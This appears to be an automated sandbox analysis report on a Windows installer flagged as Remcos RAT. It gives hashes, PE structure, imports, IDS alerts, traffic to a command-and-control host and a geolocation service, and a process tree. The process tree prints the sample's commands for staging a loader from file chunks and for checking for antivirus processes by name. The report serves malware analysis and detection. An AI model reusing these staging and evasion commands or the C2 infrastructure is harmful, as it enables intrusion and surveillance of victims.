                                                                                            SSDEEP:1536:6+l6JPTcUNx6/xhgariwYLTN3EfrDWyu0uZo28:X6i/xhgariwYLTNaWy4ZN8
                                                                                            MD5:1D7B5851C7E933B58F5A4A94E8C2FFF0
                                                                                            SHA1:35FDBA1E3AEBF7348B4478DEE028904ABA21E4CE
                                                                                            SHA-256:4D3D063A5A5A079C4D4E73F96E3C9AECDEF3F1A5A16621F28CDBA69DAEE42F4D
                                                                                            SHA-512:94E20DEE259193D12D01A1188D8FF0C21346C1FF374FCE9C63678C73D5520513F5B5CCD4C0BB6D6AABC29626F9F05EDF184BE65848FFDDEDB3358CB3FA8FF3D9
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" >), ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):96
                                                                                            Entropy (8bit):4.997693787752978
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:HRAbABGQaFyw3pYoMERE2J52A3MCT4MD5HCI/y:HRYF5yjoFi232ALBDAI/y
                                                                                            MD5:EFF2C1717680931BD475642C41E1F819
                                                                                            SHA1:CD6A7968B515D335FE6310B37D3806F01B1BC30D
                                                                                            SHA-256:67A61B14EDEA2AD7C7B00B0ACB43C18AB65E636587914407117EDDBF093A16F8
                                                                                            SHA-512:0D6098CF520868843AC7D5BCCB9206AF4F19F3234D85B2CBF8F6B09D291F1ABB8FE0F31D3BE1BF09F29B499252C16F984FCCD7D8FDAB58587324A1628CAEDEE9
                                                                                            Malicious:true
                                                                                            Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" ..
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.968381266791556
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:sXpIsdpkzy.exe
                                                                                            File size:1'304'754 bytes
                                                                                            MD5:9dcf036916a9158cc7087c80374db9ae
                                                                                            SHA1:69d9b8ffe2c74adebe1d1dcca6f42cb394e3f045
                                                                                            SHA256:28773fb2aff96e836707d9ffd5e8aa706d0ce54c956fbee42b9dd9b150e997e8
                                                                                            SHA512:d4c585730a46f900eb691fbad746e4a7354396cf5372929afdc62198c9a6e0cabf388d1c3c72dcab3b6b07d29f89c63a327a9fb4ad34e8eedb2fc03455e17727
                                                                                            SSDEEP:24576:KSFcPJBSdw3vTzQc6Uv+wwECbpoZfBlCm7pQU7H6VTPaTsNuloTEd7C7g:RYLhIcp+LNoZJwn2dYNyowH
                                                                                            TLSH:F15523E789A88C56DED91EF068F098135DB573211AB0C1976270CC5CA8966C2FE6C3F7
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                            Icon Hash:1828206868107060
                                                                                            Entrypoint:0x4038af
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:0
                                                                                            File Version Major:5
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                            Error Number:-2146869232
                                                                                            Not Before, Not After
                                                                                            • 11/10/2023 20:00:00 11/10/2026 19:59:59
                                                                                            Subject Chain
                                                                                            • CN=Anvsoft Inc., O=Anvsoft Inc., S=\u5e7f\u4e1c\u7701, C=CN, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91440300678599838F
                                                                                            Version:3
                                                                                            Thumbprint MD5:EC7B36F045D3BB302D05569D0BD6531F
                                                                                            Thumbprint SHA-1:9F99B788DFFFB11844E772AFFEC29DD91B12B8BC
                                                                                            Thumbprint SHA-256:76526A2214EE71A25AA57B9EAF03D64B0F146BE5562E2568FA089653FE4A07B9
                                                                                            Serial:6E6AEF9D6F88948F39C9D04ACD49007B
                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            xor ebp, ebp
                                                                                            pop esi
                                                                                            mov dword ptr [esp+18h], ebp
                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                            mov dword ptr [esp+14h], ebp
                                                                                            call dword ptr [00409030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004090B4h]
                                                                                            push ebp
                                                                                            call dword ptr [004092C0h]
                                                                                            push 00000008h
                                                                                            mov dword ptr [0047EB98h], eax
                                                                                            call 00007F907902BCCBh
                                                                                            push ebp
                                                                                            push 000002B4h
                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push eax
                                                                                            push ebp
                                                                                            push 0040A264h
                                                                                            call dword ptr [00409184h]
                                                                                            push 0040A24Ch
                                                                                            push 00476AA0h
                                                                                            call 00007F907902B9ADh
                                                                                            call dword ptr [004090B0h]
                                                                                            push eax
                                                                                            mov edi, 004CF0A0h
                                                                                            push edi
                                                                                            call 00007F907902B99Bh
                                                                                            push ebp
                                                                                            call dword ptr [00409134h]
                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007F907902929Ah
                                                                                            push 00000022h
                                                                                            pop esi
                                                                                            mov eax, 004CF0A2h
                                                                                            push esi
                                                                                            push eax
                                                                                            call 00007F907902B671h
                                                                                            push eax
                                                                                            call dword ptr [00409260h]
                                                                                            mov esi, eax
                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                            jmp 00007F9079029323h
                                                                                            push 00000020h
                                                                                            pop ebx
                                                                                            cmp ax, bx
                                                                                            jne 00007F907902929Ah
                                                                                            add esi, 02h
                                                                                            cmp word ptr [esi], bx
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x494a.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x1388620x6050
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x1000000x494a0x4a00bbcd26eabdf77bd97a0a903aba3b24b4False0.36602618243243246data3.73184182183754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x1050000xfd60x100028cede887af90a64b623434f833b6118False0.597900390625data5.593755428415073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x1002500xdfaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.946338736724427
                                                                                            RT_ICON0x10104c0x5e9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9900859220092532
                                                                                            RT_ICON0x1016380x2a2PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0163204747774481
                                                                                            RT_ICON0x1018dc0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.042514239218877134
                                                                                            RT_ICON0x103f440x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.1320921985815603
                                                                                            RT_DIALOG0x1043ac0x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x1044ac0x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x1045c80x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x1046280x4cdataEnglishUnited States0.7763157894736842
                                                                                            RT_MANIFEST0x1046740x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                            DLLImport
                                                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-12-12T17:40:41.645996+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.1049930181.131.217.2441515TCP
                                                                                            2024-12-12T17:40:45.938918+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1181.131.217.2441515192.168.2.1049930TCP
                                                                                            2024-12-12T17:40:47.751878+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1049944178.237.33.5080TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 12, 2024 17:40:41.520700932 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:41.645113945 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:41.645210981 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:41.645996094 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:41.765990019 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:45.938918114 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:45.940666914 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:46.060606003 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:46.174544096 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:46.222532034 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:46.369946003 CET4994480192.168.2.10178.237.33.50
                                                                                            Dec 12, 2024 17:40:46.495271921 CET8049944178.237.33.50192.168.2.10
                                                                                            Dec 12, 2024 17:40:46.495383978 CET4994480192.168.2.10178.237.33.50
                                                                                            Dec 12, 2024 17:40:46.495596886 CET4994480192.168.2.10178.237.33.50
                                                                                            Dec 12, 2024 17:40:46.617094040 CET8049944178.237.33.50192.168.2.10
                                                                                            Dec 12, 2024 17:40:47.751774073 CET8049944178.237.33.50192.168.2.10
                                                                                            Dec 12, 2024 17:40:47.751878023 CET4994480192.168.2.10178.237.33.50
                                                                                            Dec 12, 2024 17:40:47.761841059 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:47.881705999 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:48.763390064 CET8049944178.237.33.50192.168.2.10
                                                                                            Dec 12, 2024 17:40:48.763515949 CET4994480192.168.2.10178.237.33.50
                                                                                            Dec 12, 2024 17:40:50.600999117 CET151549930181.131.217.244192.168.2.10
                                                                                            Dec 12, 2024 17:40:50.628146887 CET499301515192.168.2.10181.131.217.244
                                                                                            Dec 12, 2024 17:40:50.749087095 CET151549930181.131.217.244192.168.2.10
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 12, 2024 17:39:01.090859890 CET4924353192.168.2.101.1.1.1
                                                                                            Dec 12, 2024 17:39:01.769763947 CET53492431.1.1.1192.168.2.10
                                                                                            Dec 12, 2024 17:40:39.673648119 CET6364553192.168.2.101.1.1.1
                                                                                            Dec 12, 2024 17:40:40.660368919 CET6364553192.168.2.101.1.1.1
                                                                                            Dec 12, 2024 17:40:41.517803907 CET53636451.1.1.1192.168.2.10
                                                                                            Dec 12, 2024 17:40:41.517818928 CET53636451.1.1.1192.168.2.10
                                                                                            Dec 12, 2024 17:40:46.212992907 CET4949653192.168.2.101.1.1.1
                                                                                            Dec 12, 2024 17:40:46.364586115 CET53494961.1.1.1192.168.2.10
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 12, 2024 17:39:01.090859890 CET192.168.2.101.1.1.10x545cStandard query (0)OFfdlkbKbwMNYjhkX.OFfdlkbKbwMNYjhkXA (IP address)IN (0x0001)false
                                                                                            Dec 12, 2024 17:40:39.673648119 CET192.168.2.101.1.1.10x9575Standard query (0)3diciembre.con-ip.comA (IP address)IN (0x0001)false
                                                                                            Dec 12, 2024 17:40:40.660368919 CET192.168.2.101.1.1.10x9575Standard query (0)3diciembre.con-ip.comA (IP address)IN (0x0001)false
                                                                                            Dec 12, 2024 17:40:46.212992907 CET192.168.2.101.1.1.10x8e44Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 12, 2024 17:39:01.769763947 CET1.1.1.1192.168.2.100x545cName error (3)OFfdlkbKbwMNYjhkX.OFfdlkbKbwMNYjhkXnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 12, 2024 17:40:41.517803907 CET1.1.1.1192.168.2.100x9575No error (0)3diciembre.con-ip.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                            Dec 12, 2024 17:40:41.517818928 CET1.1.1.1192.168.2.100x9575No error (0)3diciembre.con-ip.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                            Dec 12, 2024 17:40:46.364586115 CET1.1.1.1192.168.2.100x8e44No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                            • geoplugin.net
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.1049944178.237.33.50806244C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 12, 2024 17:40:46.495596886 CET71OUTGET /json.gp HTTP/1.1
                                                                                            Host: geoplugin.net
                                                                                            Cache-Control: no-cache
                                                                                            Dec 12, 2024 17:40:47.751774073 CET1171INHTTP/1.1 200 OK
                                                                                            date: Thu, 12 Dec 2024 16:40:47 GMT
                                                                                            server: Apache
                                                                                            content-length: 963
                                                                                            content-type: application/json; charset=utf-8
                                                                                            cache-control: public, max-age=300
                                                                                            access-control-allow-origin: *
                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:11:38:54
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Users\user\Desktop\sXpIsdpkzy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\sXpIsdpkzy.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'304'754 bytes
                                                                                            MD5 hash:9DCF036916A9158CC7087C80374DB9AE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:11:38:55
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd
                                                                                            Imagebase:0xd70000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:11:38:55
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff620390000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:38:56
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xf80000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:11:38:56
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr /I "wrsa opssvc"
                                                                                            Imagebase:0x920000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:11:38:57
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xf80000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:11:38:57
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                            Imagebase:0x920000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:11:38:57
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c md 33988
                                                                                            Imagebase:0xd70000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:11:38:57
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer
                                                                                            Imagebase:0x920000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:11:38:58
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w
                                                                                            Imagebase:0xd70000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:11:38:59
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\33988\Paintball.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:Paintball.com w
                                                                                            Imagebase:0x900000
                                                                                            File size:893'608 bytes
                                                                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:12
                                                                                            Start time:11:38:59
                                                                                            Start date:12/12/2024
                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                            Wow64 process (32bit):true
